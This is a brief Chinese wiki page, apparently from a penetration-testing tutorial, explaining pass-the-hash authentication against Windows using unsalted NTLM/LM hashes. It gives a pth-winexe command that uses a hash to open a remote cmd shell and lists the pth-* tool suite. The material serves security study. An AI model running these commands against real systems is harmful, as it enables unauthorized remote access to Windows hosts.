密文登录
不死鸟 edited this page Mar 23, 2018
·
1 revision
仅支持windows
- 密码破解耗费时间资源巨大
- 使用密文提交给服务器直接完成身份认证
- NTLM/LM是没有加盐的静态HASH密文
- 企业中使用ghost等工具克隆安装系统, 可能直接控制全部
pth-winexe -U user%aad3b435b51404eeaad3b435b51404ee:ed1bfaeb3063 716ab7fe2a11faf126d8 //1.1.1.1 cmd
pth-*有如下工具:
pth-curl
pth-net
pth-rpcclient
pth-smbclient
pth-smbget
pth-sqsh
pth-winexe
pth-wmic
pth-wmis
- web渗透简介及基础知识
- 侦查工具
- 扫描工具
- 手动漏洞挖掘
- WebShell
- HTTPS攻击
- SSL中间人攻击及ddos
- 一些概念
﹊﹊﹊﹊﹊﹊﹊﹊﹊﹊
This wiki is created by [amWiki]